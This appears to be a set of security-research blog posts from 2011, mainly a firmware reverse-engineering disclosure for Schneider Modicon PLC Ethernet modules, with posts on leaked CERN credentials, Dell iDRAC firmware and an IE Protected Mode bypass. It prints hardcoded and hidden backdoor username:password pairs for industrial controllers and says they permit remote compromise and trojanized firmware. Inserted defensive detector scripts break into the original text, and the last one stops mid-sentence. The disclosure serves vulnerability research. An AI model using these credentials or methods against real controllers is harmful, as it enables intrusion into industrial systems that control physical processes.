ROM:200701BC LDR R0, =aTestingpw ; "testingpw"
ROM:200701C0 BL loginDefaultEncrypt
ROM:200701C4 LDR R1, =0x203C572A
ROM:200701C8 LDR R0, =aTest ; "test"
ROM:200701CC BL loginUserAdd
ROM:200701D0 LDR R1, =0x2038DBB8
ROM:200701D4 LDR R0, =aFwdownload ; "fwdownload"
ROM:200701D8 BL loginDefaultEncrypt
ROM:200701DC LDR R1, =0x2038DBB8
ROM:200701E0 LDR R0, =aLoader ; "loader"
ROM:200701E4 BL loginUserAdd
ROM:200701E8 LDR R1, =0x203948C0
ROM:200701EC LDR R0, =aWebpages ; "webpages"
ROM:200701F0 BL loginDefaultEncrypt
ROM:200701F4 LDR R1, =0x203948C0
ROM:200701F8 LDR R0, =aWebserver ; "webserver"
ROM:200701FC BL loginUserAdd
ROM:20070200 LDR R1, =0x203C5B78
ROM:20070204 LDR R0, =aFactorycastSch ; "factorycast@schneider"
ROM:20070208 BL loginDefaultEncrypt
ROM:2007020C LDR R1, =0x203C5B78
ROM:20070210 LDR R0, =aSysdiag ; "sysdiag"
ROM:20070214 BL loginUserAdd
ROM:20070218 LDR R1, =0x2038D4CC
ROM:2007021C LDR R0, =aNtpupdate ; "ntpupdate"
ROM:20070220 BL loginDefaultEncrypt
ROM:20070224 LDR R1, =0x2038D4CC
ROM:20070228 LDR R0, =aNtpupdate ; "ntpupdate"
ROM:2007022C BL loginUserAdd
ROM:20070230 LDR R1, =0x2039096C
ROM:20070234 LDR R0, =aPcfactory ; "pcfactory"
ROM:20070238 BL loginDefaultEncrypt
ROM:2007023C LDR R1, =0x2039096C
ROM:20070240 LDR R0, =aPcfactory ; "pcfactory"
ROM:20070244 BL loginUserAdd

More hardcoded credentials in plain text: USER:USERUSER

ROM:200679BC
ROM:200679BC ftpAddWebUserPw ; CODE XREF: EthernetManager::initialize(void):loc_20029A10p
ROM:200679BC MOV R12, SP
ROM:200679C0 STMFD SP!, {R11,R12,LR,PC}
ROM:200679C4 LDR R1, =0x2037CA05
ROM:200679C8 SUB R11, R12, #4
ROM:200679CC LDR R0, =0x2037C9B4
ROM:200679D0 BL ftpGetWebUserPw
ROM:200679D4 CMN R0, #1
ROM:200679D8 LDR R1, =(aUseruser+4)
ROM:200679DC LDR R0, =0x2037C9B4
ROM:200679E0 BEQ loc_20067A00
ROM:200679E4
ROM:200679E4 loc_200679E4 ; CODE XREF: ftpAddWebUserPw+54j
ROM:200679E4 LDR R1, =0x2037CA05
ROM:200679E8 LDR R0, =0x2037C9B4
ROM:200679EC BL loginUserAdd
ROM:200679F0 LDR R0, =0x2037C9B4
ROM:200679F4 LDR R1, =aSdcaWeb ; "/SDCA/WEB"
ROM:200679F8 LDMFD SP, {R11,SP,LR}
ROM:200679FC B ftpPathAccessRegister
ROM:20067A00 ; ---------------------------------------------------------------------------
ROM:20067A00
ROM:20067A00 loc_20067A00 ; CODE XREF: ftpAddWebUserPw+24j
ROM:20067A00 BL strcpy
ROM:20067A04 LDR R1, =0x2037CA05
ROM:20067A08 LDR R0, =aUseruser ; "USERUSER"
ROM:20067A0C BL loginDefaultEncrypt
ROM:20067A10 B loc_200679E4
ROM:20067A10 ; End of function ftpAddWebUserPw
ROM:20067A10
ROM:20067A10 ; ---------------------------------------------------------------------------

MODBUS 125 dispatcher to ModbusFC125::process125Command handler

ROM:20044830
ROM:20044830 ; ModbusFC125::processModbusMessage(MBAPMSG *, int *)
ROM:20044830 _ZN11ModbusFC12520processModbusMessageEP7MBAPMSGPi
ROM:20044830 ; CODE XREF: g_processModbusMessage:loc_200448D8p
ROM:20044830 MOV R12, SP
ROM:20044834 STMFD SP!, {R4,R5,R11,R12,LR,PC}
ROM:20044838 SUB R11, R12, #4
ROM:2004483C MOV R5, R2
ROM:20044840 MOV R4, R1
ROM:20044844 MOV R3, R1
ROM:20044848 MOV R2, #1
ROM:2004484C LDRB R12, [R1,#7]
ROM:20044850 CMP R12, #0x7D ; '}'
ROM:20044854 BEQ loc_20044884
ROM:20044858 MOV R1, R12
ROM:2004485C BL _ZN11ModbusFC1259MbusErrorEhhP7MBAPMSG ; ModbusFC125::MbusError(uchar,uchar,MBAPMSG *)
ROM:20044860
ROM:20044860 loc_20044860 ; CODE XREF: ModbusFC125::processModbusMessage(MBAPMSG *,int *)+58j
ROM:20044860 ADD R0, R0, #1
ROM:20044864 AND R3, R0, #0xFF00
ROM:20044868 MOV R3, R3,ASR#8
ROM:2004486C AND R2, R0, #0xFF
ROM:20044870 ORR R3, R3, R2,LSL#8
ROM:20044874 ADD R1, R0, #6
ROM:20044878 STRH R3, [R4,#4]
ROM:2004487C STR R1, [R5]
ROM:20044880 LDMFD SP, {R4,R5,R11,SP,PC}
ROM:20044884 ; ---------------------------------------------------------------------------
ROM:20044884
ROM:20044884 loc_20044884 ; CODE XREF: ModbusFC125::processModbusMessage(MBAPMSG *,int *)+24j
ROM:20044884 BL _ZN11ModbusFC12517process125CommandEP7MBAPMSG ; ModbusFC125::process125Command(MBAPMSG *)
ROM:20044888 B loc_20044860
ROM:20044888 ; End of function ModbusFC125::processModbusMessage(MBAPMSG *,int *)
ROM:20044888

Just an example: to inject our own code we could use external modules.
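The same check from the monitoring side, as an added example (my own Python, not code from the page or from Schneider): the dispatcher above reads the byte at offset 7 of the MBAP message, right after the 7-byte MBAP header, and only enters process125Command when it equals 0x7D, so a sensor watching TCP/502 can parse each request the same way and raise an alert whenever function code 125 shows up, which on this device is the firmware-update path. The frames are constructed for the example.

```python
"""Flag Modbus/TCP requests that carry function code 125 (0x7D).

Added example for monitoring, not code from the page or from Schneider.
The frames below are constructed; a real sensor would feed it the payload
of each TCP segment on port 502.
"""
import struct

MBAP_LEN = 7                 # transaction id (2) + protocol id (2) + length (2) + unit id (1)
FC_FIRMWARE_UPDATE = 0x7D    # Modbus function code 125, the firmware-update path on this device

def parse_mbap(frame: bytes) -> dict:
    """Split one Modbus/TCP request into MBAP fields, function code and PDU data.
    Raises ValueError on truncated or inconsistent frames rather than guessing."""
    if len(frame) < MBAP_LEN + 1:
        raise ValueError("frame shorter than MBAP header plus function code")
    tid, pid, length, unit = struct.unpack(">HHHB", frame[:MBAP_LEN])
    if pid != 0:
        raise ValueError("protocol id %d is not Modbus" % pid)
    # The length field counts the unit id plus the whole PDU that follows.
    if length != len(frame) - 6:
        raise ValueError("length field %d disagrees with %d bytes present" % (length, len(frame) - 6))
    return {
        "transaction_id": tid,
        "unit_id": unit,
        "function_code": frame[7],   # the byte the dispatcher compares with 0x7D
        "data": frame[8:],
    }

def classify(frame: bytes) -> str:
    """'ALERT' for FC 125, 'ok' for any other well-formed request, 'malformed' otherwise."""
    try:
        fields = parse_mbap(frame)
    except ValueError:
        return "malformed"
    return "ALERT" if fields["function_code"] == FC_FIRMWARE_UPDATE else "ok"

def scan(frames) -> list:
    """Classify a capture; returns (index, verdict) pairs, one per frame, for logging."""
    return [(i, classify(f)) for i, f in enumerate(frames)]

# Constructed frames, big-endian as on the wire.
READ_HOLDING = bytes.fromhex("000100000006" "01" "03" "0000000A")   # FC 3: read 10 registers
FC125_FRAME  = bytes.fromhex("000200000006" "01" "7D" "00010000")   # FC 0x7D with dummy data
TRUNCATED    = bytes.fromhex("000300000006" "01")                    # header only, no function code

if __name__ == "__main__":
    for idx, verdict in scan([READ_HOLDING, FC125_FRAME, TRUNCATED]):
        print("frame %d: %s" % (idx, verdict))
```

Malformed frames are reported rather than dropped on purpose: a parser that silently skips them would also skip anything an unusual client sends, which is exactly the traffic worth a second look on a PLC network.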
In fact, this is how the webserver is implemented: as a separate module loaded at runtime, 'webserver.out'.

ROM:200BA7BC ; Attributes: bp-based frame
ROM:200BA7BC
ROM:200BA7BC http_init ; CODE XREF: HttpTask:loc_200BA9B8p
ROM:200BA7BC
ROM:200BA7BC var_50 = -0x50
ROM:200BA7BC var_4C = -0x4C
ROM:200BA7BC var_48 = -0x48
ROM:200BA7BC var_44 = -0x44
ROM:200BA7BC var_40 = -0x40
ROM:200BA7BC var_3C = -0x3C
ROM:200BA7BC var_38 = -0x38
ROM:200BA7BC var_34 = -0x34
ROM:200BA7BC var_30 = -0x30
ROM:200BA7BC var_2C = -0x2C
ROM:200BA7BC var_28 = -0x28
ROM:200BA7BC var_24 = -0x24
ROM:200BA7BC var_1D = -0x1D
ROM:200BA7BC
ROM:200BA7BC MOV R12, SP
ROM:200BA7C0 STMFD SP!, {R4-R7,R11,R12,LR,PC}
ROM:200BA7C4 SUB R11, R12, #4
ROM:200BA7C8 LDR R6, =0x203804F8
ROM:200BA7CC SUB SP, SP, #0x34
ROM:200BA7D0 LDR R3, [R6]
ROM:200BA7D4 ANDS R5, R3, #1
ROM:200BA7D8 BEQ loc_200BA7E4
ROM:200BA7DC
ROM:200BA7DC loc_200BA7DC ; CODE XREF: http_init+104j
ROM:200BA7DC ; http_init+124j ...
ROM:200BA7DC SUB SP, R11, #0x1C
ROM:200BA7E0 LDMFD SP, {R4-R7,R11,SP,PC}
ROM:200BA7E4 ; ---------------------------------------------------------------------------
ROM:200BA7E4
ROM:200BA7E4 loc_200BA7E4 ; CODE XREF: http_init+1Cj
ROM:200BA7E4 LDR R1, =aSdcaWeb_0 ; "/SDCA/Web/"
ROM:200BA7E8 LDR R0, =0x203C5970
ROM:200BA7EC BL strcpy
ROM:200BA7F0 LDR R0, =HttpServerFile ; "/SDCA/Firmware/WebServer.out"
ROM:200BA7F4 MOV R1, R5
ROM:200BA7F8 MOV R2, R5
ROM:200BA7FC BL open
ROM:200BA800 CMN R0, #1
ROM:200BA804 MOV R4, R0
ROM:200BA808 BEQ loc_200BA8E4
ROM:200BA80C MOV R1, #0xC
ROM:200BA810 BL loadModule
ROM:200BA814 CMP R0, #0
ROM:200BA818 BEQ loc_200BA8C4
ROM:200BA81C LDR R7, =0x203945EC
ROM:200BA820 MOV R0, R4
ROM:200BA824 BL close
ROM:200BA828 LDR R0, [R7]
ROM:200BA82C LDR R1, =HttpServerEntry ; "websvxmain"
ROM:200BA830 SUB R2, R11, #-var_24
ROM:200BA834 SUB R3, R11, #-var_1D
ROM:200BA838 BL symFindByName
ROM:200BA83C CMN R0, #1
ROM:200BA840 BEQ loc_200BA904
ROM:200BA844 LDR R3, =HttpServerPrio
ROM:200BA848 LDR R2, =HttpServerStack
ROM:200BA84C LDR R12, [R11,#var_24]
ROM:200BA850 LDR R1, [R3]
ROM:200BA854 LDR R0, =aThttpd ; "tHttpd"
ROM:200BA858 LDR R3, [R2]
ROM:200BA85C MOV R2, R5
ROM:200BA860 STR R12, [SP,#0x50+var_50]
ROM:200BA864 LDR R4, =0x203804FC
ROM:200BA868 STR R5, [SP,#0x50+var_4C]
ROM:200BA86C STR R5, [SP,#0x50+var_48]
ROM:200BA870 STR R5, [SP,#0x50+var_44]
ROM:200BA874 STR R5, [SP,#0x50+var_40]
ROM:200BA878 STR R5, [SP,#0x50+var_3C]
ROM:200BA87C STR R5, [SP,#0x50+var_38]
ROM:200BA880 STR R5, [SP,#0x50+var_34]
ROM:200BA884 STR R5, [SP,#0x50+var_30]
ROM:200BA888 STR R5, [SP,#0x50+var_2C]
ROM:200BA88C STR R5, [SP,#0x50+var_28]
ROM:200BA890 BL taskSpawn

So, why do all those hidden accounts exist? A good question.
- Generating a password by deriving it from the MAC address makes sense as a method to gain access even if the original password has been lost. Technically, these accounts are backdoors though.
- Most of them are used by configuration/(internal?) support software. For example, the hidden account 'loader:fwdownload' can be found inside Unity Loader.
- In fact we can find more hidden accounts by reversing this kind of software, e.g. a hidden account for Schneider Advantys STB devices, found by reversing the software used to upgrade the firmware.
Schneider Advantys STB modules - nip2311_upgrade_[fw]_v3.01.00_[web]_v2.01.00.exe

.text:00403579
.text:00403579 loc_403579: ; CODE XREF: sub_403546+22j
.text:00403579 cmp dword_4134EC, 1
.text:00403580 jnz short loc_4035A7
.text:00403582 push dword ptr [edi] ; int
.text:00403584 push offset aFcsdfcsd ; "fcsdfcsd"
.text:00403589 push offset aNip2212 ; "nip2212"
.text:0040358E call _FtpLogin
.text:00403593 add esp, 0Ch
.text:00403596 mov ebx, eax
.text:00403598 test eax, eax
.text:0040359A jnz loc_403623
.text:004035A0 mov esi, 1
.text:004035A5 jmp short loc_403623
.text:004035A7 ; ---------------------------------------------------------------------------
.text:004035A7
.text:004035A7 loc_4035A7: ; CODE XREF: sub_403546+3Aj
.text:004035A7 cmp dword_4134E4, 1
.text:004035AE jnz short loc_4035D1
.text:004035B0 push dword ptr [edi] ; int
.text:004035B2 push offset aQwertyqwerty ; "qwertyqwerty"
.text:004035B7 push (offset a00kernel0011ex+0AAh) ; s
.text:004035BC call _FtpLogin
.text:004035C1 add esp, 0Ch
.text:004035C4 mov ebx, eax
.text:004035C6 test eax, eax
.text:004035C8 jnz short loc_403623
.text:004035CA mov esi, 1
.text:004035CF jmp short loc_403623
.text:004035D1 ; ---------------------------------------------------------------------------
.text:004035D1
.text:004035D1 loc_4035D1: ; CODE XREF: sub_403546+68j
.text:004035D1 cmp dword_4134E8, 1
.text:004035D8 jnz short loc_4035FB
.text:004035DA push dword ptr [edi] ; int
.text:004035DC push offset aPoiuypoiuy ; "poiuypoiuy"
.text:004035E1 push offset aNic2212 ; "nic2212"
.text:004035E6 call _FtpLogin
.text:004035EB add esp, 0Ch
.text:004035EE mov ebx, eax
.text:004035F0 test eax, eax
.text:004035F2 jnz short loc_403623
.text:004035F4 mov esi, 1
.text:004035F9 jmp short loc_403623
.text:004035FB ; ---------------------------------------------------------------------------
.text:004035FB
.text:004035FB loc_4035FB: ; CODE XREF: sub_403546+92j
.text:004035FB cmp dword_4134F0, 1
.text:00403602 jnz short loc_403623
.text:00403604 push dword ptr [edi] ; int
.text:00403606 push offset aPcfactory ; "pcfactory"
.text:0040360B push offset aPcfactory_0 ; "pcfactory"
.text:00403610 call _FtpLogin
.text:00403615 add esp, 0Ch
.text:00403618 mov ebx, eax
.text:0040361A test eax, eax
.text:0040361C jnz short loc_403623
.text:0040361E mov esi, 1

Well, enough. We could be writing for a long time about all the interesting things you can find inside one of these firmwares, but hey! now you have all the info needed to do so :)

Summing up
- In order to fully understand the PLC/Ethernet module, the backplane and other protocols (e.g. Unity's UMAS) we can reverse engineer the firmware, the Java classes and vendor software like Unity Loader.
- You can remotely compromise Modicon PLCs exposed via NOE Ethernet modules through FTP, Telnet, Modbus, WDB, SNMP, web... by using the backdoor credentials exposed, or even without using them.
- You can load your own trojanized firmware.
- There are undocumented hidden accounts that can be used to compromise a PLC.
- There are undocumented functionalities with security implications.
- There is no solution other than redesigning these devices, which obviously is not feasible in the short/medium term, so mitigations are needed and expected.
- There is no patch available at this moment.
Products affected: http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-346-01.pdf

Backdoor accounts compilation
pcfactory:pcfactory (hidden)
loader:fwdownload (hidden)
ntpupdate:ntpupdate (documented)
sysdiag:factorycast@schneider (documented)
test:testingpw (hidden)
USER:USER (documented)
USER:USERUSER (documented -not hidden-) (thanks to Stephan Beirer for pointing it out)
webserver:webpages (hidden)
fdrusers:sresurdf (hidden)
nic2212:poiuypoiuy (hidden)
nimrohs2212:qwertyqwerty (hidden)
nip2212:fcsdfcsd (hidden)
ftpuser:ftpuser (hidden)
noe77111_v500:RcSyyebczS (hidden) (password hashed)
AUTCSE:RybQRceeSd (hidden) (password hashed)
AUT_CSE:cQdd9debez (hidden) (password hashed)
target:RcQbRbzRyc (hidden) (password hashed)

Although I'm releasing this information while there is still no patch available, it has been my decision. I reported it to the ICS-CERT months ago. I would like to thank the ICS-CERT and the Schneider security team; they have taken these issues very seriously and are working on a patch. During the process they have kept me updated on every decision and progress. However, some time ago I decided to change my disclosure policy. I would like to mention that other security researchers I talked to about this issue had found these hidden accounts as well, so kudos to K. Reid Wightman @ReverseICS and Jaime Blasco @jaimeblascob. Welcome to the 90s.
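Since the summary above says these modules can be compromised over FTP with the listed accounts, the practical mitigation until a patch exists is to watch for them being used. The following detector is an added example, not code from the original post: it replays an FTP control channel as seen on a network tap or in the module's FTP log and flags sessions whose USER is one of the account names compiled above. The transcript format (session id, C/S direction, text) and the sample sessions are my own construction.

```python
"""Detect FTP logins that use the hidden account names compiled above.

Added example, not part of the original post. It replays an FTP control
channel as a defender would see it on a network tap or in the module's FTP
log. The transcript format (session id, C/S direction, text) is my own, and
the sample session is constructed; the watchlist is the username half of the
backdoor account compilation.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Usernames from the compilation above (passwords are deliberately not kept).
BACKDOOR_USERS = frozenset({
    "pcfactory", "loader", "ntpupdate", "sysdiag", "test", "USER",
    "webserver", "fdrusers", "nic2212", "nimrohs2212", "nip2212",
    "ftpuser", "noe77111_v500", "AUTCSE", "AUT_CSE", "target",
})

# Constructed sample: three interleaved sessions; passwords already masked.
SAMPLE_TRANSCRIPT = """\
s1 C USER operator
s1 S 331 Password required
s1 C PASS ********
s1 S 230 User logged in
s2 C USER nip2212
s2 S 331 Password required
s2 C PASS ********
s2 S 230 User logged in
s3 C USER pcfactory
s3 S 331 Password required
s3 C PASS ********
s3 S 530 Login incorrect
s2 C STOR wwwroot/conf/exec/NOE7711.bin
s2 S 150 Opening BINARY mode data connection
"""

LINE_RE = re.compile(r"^(?P<sid>\S+)\s+(?P<dir>[CS])\s+(?P<text>.*)$")


@dataclass
class Session:
    user: Optional[str] = None
    logged_in: bool = False
    uploads: List[str] = field(default_factory=list)


def analyse(transcript: str) -> Dict[str, Session]:
    """Replay the control channel and keep per-session login state."""
    sessions: Dict[str, Session] = {}
    for raw in transcript.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue                      # skip noise lines
        s = sessions.setdefault(m["sid"], Session())
        text = m["text"]
        if m["dir"] == "C":
            verb, _, arg = text.partition(" ")
            verb = verb.upper()
            if verb == "USER":            # a new login attempt resets state
                s.user, s.logged_in = arg.strip(), False
            elif verb in ("STOR", "APPE") and s.logged_in:
                s.uploads.append(arg.strip())   # firmware/web content writes
        else:
            code = text[:3]               # three-digit FTP reply code
            if code == "230":
                s.logged_in = True
            elif code == "530":
                s.logged_in = False
    return sessions


def alerts(transcript: str) -> List[str]:
    """One alert per session whose USER is on the watchlist."""
    out: List[str] = []
    for sid, s in analyse(transcript).items():
        if s.user is None or s.user not in BACKDOOR_USERS:
            continue
        if s.logged_in:
            msg = f"HIGH {sid}: backdoor account '{s.user}' logged in"
            if s.uploads:
                msg += "; uploaded " + ", ".join(s.uploads)
        else:
            msg = f"MEDIUM {sid}: backdoor account '{s.user}' attempted, no successful login seen"
        out.append(msg)
    return out


if __name__ == "__main__":
    for line in alerts(SAMPLE_TRANSCRIPT):
        print(line)
```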
The power of reading: The CERN case.
(Thursday, 18 August 2011) Written by Rubén
First of all, my respect and admiration to the people working at CERN and to scientists in general. Humanity has evolved thanks to minds like theirs. I guess we would all agree that the most useful advice commonly received, or given, in this sector is: read, read everything you can, and more... and that's how this story begins. Some time ago, I spent a few hours compiling all the documentation/software I could find about UNICOS (Unified Industrial Control System), which is the SCADA system of CERN's Large Hadron Collider. In the end I managed to grab 2+ GB of related stuff. Yes, there is quite a lot of information and software available; that's the good thing about the academic world. On the other hand, some of that information shouldn't be publicly available. This is a problem inherent to academia: a lot of people accessing a lot of systems from a lot of places. A security nightmare for network administrators. E.g. did you ever try to browse public AFS folders? Oh boy... So, days later, I spent quite a few hours reading all that documentation and taking a look at the software, trying to understand how things were working at the LHC. I had found several sources of info, but above all I downloaded a huge amount of docs from a specific website; while reading them I realized that these were not intended for 'public consumption'. Internal proceedings, info about PLCs, the Profibus network, IPs... and a couple of user/password accounts.

Redacted

The document where these accounts were mentioned looked so interesting that I had to test whether they were valid or not. https://winservices.web.cern.ch/winservices/Help/Contents/Files/TerminalServices/TerminalServicesUsing.pdf One account was not active, but the other one... landed!
Then I installed Metasploit and through lateral movement I gained access to the LHC Control System; I covertly replaced beams with beans, so instead of protons, during a whole week the LHC was detecting the collisions produced in a traditional English breakfast. Just kidding... Once I verified the credentials were valid I contacted ICS-CERT warning about this scenario, where a potential attacker could end up accessing the LHC's control systems (better said, one of them). In a really short period the credentials were removed, even from Google's cache, so thanks to those involved. The official response from CERN was the following:
* The documents have been removed from that public web site.
* The documents have been requested to be purged from Google cache, and subsequently removed by Google.
* One password was valid, the second long outdated. The valid password has been changed on all instances.
* We have checked our web logs and did not find any suspicious accesses to those documents. Due to our defence-in-depth approach, direct access was and would have been impossible to that particular system. Local access would have been needed.
Well, I cannot say that accessing that system is possible; however, within our sector 'impossible' is a risky word. Take a look at these publicly available documents:
+ http://alicedcs.web.cern.ch/AliceDCS/Documents/terminal%20services.doc
+ http://indico.cern.ch/getFile.py/access?contribId=7&resId=0&materialId=slides&confId=13367
If this architecture is still active I wouldn't say "impossible" but rather "difficult". Remember Stuxnet... and in regard to smartcard 'local' security take a look at this great presentation from my fellow Gabriel Gonzalez http://www.gabrielgonzalezgarcia.com/2011/04/18/man-in-remote/ Please note that you can even download PVSS projects at http://j2eeps.cern.ch/wikis/display/EN/UNICOS-PVSS . Too much information available? Maybe... Again, kudos to the CERN staff, their research is awesome.
Reversing DELL's DRAC firmware
(Monday, 15 August 2011) Written by Rubén
Update #1 http://twitter.com/#!/reversemode/status/103372506869661696
Update #2 http://twitter.com/#!/reversemode/status/103386457707782144 pam_local_manager.so != pam_unix.so, so /etc/shadow is not being used to authenticate users :(

Hi,
Firmware reversing is really interesting; better said, not only interesting but mandatory when you are researching SCADA devices. However, this time I'm going to explain how to discover vulnerabilities in embedded systems without needing the device at all. In this case our target is the latest version of DELL's out-of-band management system: iDRAC 6. When facing new software/hardware, the first thing to do is to find as much documentation as possible about the system. By reading Wikipedia's entry about DRAC we come across the most important references; moreover, simple Google searches show a lot of interesting results. Although the source code of certain components of the DELL DRAC firmware is available, Dell provides neither the environment to create a functional firmware nor the code of a fully functional final version. Therefore we do not have access to the most interesting part, and reverse engineering comes into play. Let's see how far we can go. You can download the latest version from Dell's support page http://support.us.dell.com/support/downloads/format.aspx?releaseid=R299265&c=us&l=en&cs=&s=gen It's a self-extracting zip that unpacks two files, one of them being the firmware "firmimg.d6" (54 MB). Now we can start by using binwalk to see how much info it can extract. We cannot blindly trust this program, since it is signature-based and sometimes returns false positives and/or results that make no sense. Anyway, it's a good starting point.
DECIMAL       HEX         DESCRIPTION
--------------------------------------------------------------------------------
512           0x200       uImage header, created: Sat Mar 12 21:17:47 2011, image size: 4479904 bytes, Data Address: 0x8000, Entry Point: 0x8000, CRC: 0x1BB8BE08, OS: Linux, CPU: ARM, image type: OS Kernel Image, compression type: none, image name: arm-linux
12424         0x3088      romfs filesystem, version 1 1,892,957,376 bytes, named \240\324
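Signature-based carving is only a hint, as noted above; the way to confirm a uImage hit is to decode the 64-byte header and check its CRCs. The parser below is an added example, not code from the original post or from binwalk: it reads U-Boot's public image_header_t layout and verifies both the header CRC and the data CRC. The sample image is constructed here to mirror the binwalk line above (ARM Linux kernel at offset 0x200, load/entry 0x8000, name "arm-linux", the printed timestamp taken as UTC); its payload is a handful of ARM NOPs, not real kernel code.

```python
"""Parse and verify the U-Boot uImage header binwalk found at offset 0x200.

Added example, not part of the original post. The 64-byte layout is U-Boot's
public image_header_t; the sample image is constructed here to mirror the
binwalk line above (ARM Linux kernel, load/entry 0x8000, name "arm-linux",
timestamp taken as UTC). The fake "kernel" payload is a few ARM NOP words.
"""
import struct
import time
import zlib
from typing import NamedTuple

UIMAGE_MAGIC = 0x27051956
HEADER_FMT = ">IIIIIIIBBBB32s"            # all fields big-endian
HEADER_LEN = struct.calcsize(HEADER_FMT)   # 64 bytes

# Subsets of the U-Boot ih_os / ih_arch / ih_type / ih_comp enums.
OS_NAMES = {5: "Linux"}
ARCH_NAMES = {2: "ARM"}
TYPE_NAMES = {2: "OS Kernel Image"}
COMP_NAMES = {0: "none", 1: "gzip", 2: "bzip2", 3: "lzma"}


class UImageHeader(NamedTuple):
    timestamp: int
    size: int
    load: int
    entry: int
    data_crc: int
    os_name: str
    arch: str
    image_type: str
    compression: str
    name: str
    header_crc_ok: bool
    data_crc_ok: bool


def parse_uimage(blob: bytes, offset: int = 0) -> UImageHeader:
    """Decode the header at `offset` and check both CRCs.

    The header CRC covers the 64 header bytes with the hcrc field zeroed;
    the data CRC covers the `size` bytes that follow the header. A header
    that decodes but fails its CRC is the usual sign of a false positive or
    a modified image, which is why both flags are returned rather than raised.
    """
    hdr = blob[offset:offset + HEADER_LEN]
    if len(hdr) != HEADER_LEN:
        raise ValueError("truncated header")
    (magic, hcrc, ts, size, load, ep, dcrc,
     os_, arch, typ, comp, name) = struct.unpack(HEADER_FMT, hdr)
    if magic != UIMAGE_MAGIC:
        raise ValueError(f"bad magic 0x{magic:08x}")
    zeroed = hdr[:4] + b"\0\0\0\0" + hdr[8:]
    header_ok = zlib.crc32(zeroed) == hcrc
    data = blob[offset + HEADER_LEN:offset + HEADER_LEN + size]
    data_ok = len(data) == size and zlib.crc32(data) == dcrc
    return UImageHeader(
        ts, size, load, ep, dcrc,
        OS_NAMES.get(os_, f"os#{os_}"), ARCH_NAMES.get(arch, f"arch#{arch}"),
        TYPE_NAMES.get(typ, f"type#{typ}"), COMP_NAMES.get(comp, f"comp#{comp}"),
        name.split(b"\0", 1)[0].decode("ascii", "replace"),
        header_ok, data_ok)


def build_uimage(payload: bytes, name: str, load: int, entry: int, ts: int) -> bytes:
    """Build a valid ARM/Linux/kernel/uncompressed uImage (sample construction only)."""
    dcrc = zlib.crc32(payload)
    fields = [UIMAGE_MAGIC, 0, ts, len(payload), load, entry, dcrc,
              5, 2, 2, 0, name.encode("ascii").ljust(32, b"\0")]
    fields[1] = zlib.crc32(struct.pack(HEADER_FMT, *fields))  # hcrc over zeroed header
    return struct.pack(HEADER_FMT, *fields) + payload


# Constructed sample: 0x200 bytes of padding (as in firmimg.d6) then the image.
SAMPLE_TS = 1299964667                      # Sat Mar 12 21:17:47 2011 UTC
SAMPLE_IMAGE = b"\xff" * 0x200 + build_uimage(
    b"\x00\x00\xa0\xe1" * 64, "arm-linux", 0x8000, 0x8000, SAMPLE_TS)


if __name__ == "__main__":
    h = parse_uimage(SAMPLE_IMAGE, 0x200)
    created = time.strftime("%a %b %d %H:%M:%S %Y", time.gmtime(h.timestamp))
    print(f"uImage created: {created}, size: {h.size}, load: 0x{h.load:x}, "
          f"entry: 0x{h.entry:x}, {h.os_name}/{h.arch}, {h.image_type}, "
          f"compression: {h.compression}, name: {h.name}, "
          f"crc ok: header={h.header_crc_ok} data={h.data_crc_ok}")
```

Run against the real firmimg.d6, `parse_uimage(open(path, "rb").read(), 0x200)` tells you whether the binwalk hit is a consistent image and whether the 4479904 data bytes that follow are intact.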
Silent bug is silent.
(Wednesday, 10 August 2011) Written by Rubén
Hi there,
During the last months, completed in this Patch Tuesday, Microsoft has 'abruptly' changed a policy that had been in place for years: http://blogs.msdn.com/b/ieinternals/archive/2011/03/09/internet-explorer-9-xbap-disabled-in-the-internet-zone.aspx I guess that XBAP apps were posing a risk level too high to be accepted. At the same time, they have silently fixed a blatant method to bypass IE Protected Mode that I discovered a long time ago... let me explain it briefly.
There are 3 main integrity levels: low, medium, high. IE8/9 launches two different processes:
-> Broker/Monitor (medium integrity) (parent)
-> Browser (low integrity) (child)
The low integrity instance is where those funny shellcodes are executed, so we should understand this flaw as the second stage within a client-side exploitation scenario. Therefore, remote code execution is mandatory before taking advantage of this flaw. A common scenario would be the following:
1. Ban Ki-Moon visits a malicious U.N website where a RCE vulnerability is triggered within the context of the low integrity IE.
2. A local exploit is executed to bypass IE Protected Mode.
3. VLC playing the Nyan Cat video is launched as a medium integrity process.
But... How!?
Microsoft introduced the concept of "broker processes" to let extensions running inside the IE low integrity instance perform operations that need higher privileges. These processes are registered under the following key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy
Thus, if a low integrity instance invokes one of these registered broker processes, the medium integrity instance will handle the request, sometimes even without prompting the user. It depends on this policy:
0x3 = Protected Mode silently launches the broker as a medium integrity process
PresentationHost.exe is registered as a broker process of type 3. Basically, this process takes care of WPF applications.
Ok, so far we can silently launch this process as a medium integrity process. However we still need another step: we should be able to take advantage of this feature to launch an arbitrary executable as a medium integrity process. Now comes the interesting part. There was (or even *is*) a design flaw in Windows Vista and 7; by reading the specs I noted an interesting behavior: WPF applications run inside PresentationHost's sandbox and their graphical output is rendered inside Internet Explorer. Cool. Game over. I love this flaw because reverse engineering is not involved as usual; all you need to do is read documentation. I wonder how many people also discovered this flaw; surely I was not the only one. So, taking into account that XBAP applications loaded from the local file system (even from LocalLow ;) ) were considered full-trust applications (with no restrictions in terms of CAS), we could abuse this design flaw to execute an arbitrary .NET application as a medium integrity process from our IE low integrity instance. Unfortunately the trick no longer works, since urlmon!CSecurityManager::MapToUrlZone, no matter the location of your XBAP app, will map it to the Internet Zone. This prevents XBAP apps from being loaded, because the new default for URLACTION_WINDOWS_BROWSER_APPLICATIONS is 'Disabled'.
References I used to discover this bug:
Understanding and Working in Protected Mode Internet Explorer http://msdn.microsoft.com/en-us/library/bb250462(VS.85).aspx
Windows Presentation Foundation Security Sandbox http://msdn.microsoft.com/en-us/library/aa480229.aspx
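The attack surface described above is the set of brokers registered with Policy 3, so a defender's first question is which executables on a given machine elevate silently. The script below is an added example, not code from the original post: it parses a regedit text export of the ElevationPolicy key and lists every entry whose Policy DWORD is 3. The GUIDs and paths in the sample export are constructed placeholders; PresentationHost.exe is the one real broker the post names.

```python
"""Audit an exported ElevationPolicy key for brokers that elevate silently.

Added example, not from the original post. It parses a .reg export (regedit's
text format) of the ElevationPolicy key and lists every broker whose Policy is
3, i.e. launched silently as a medium-integrity process, the class
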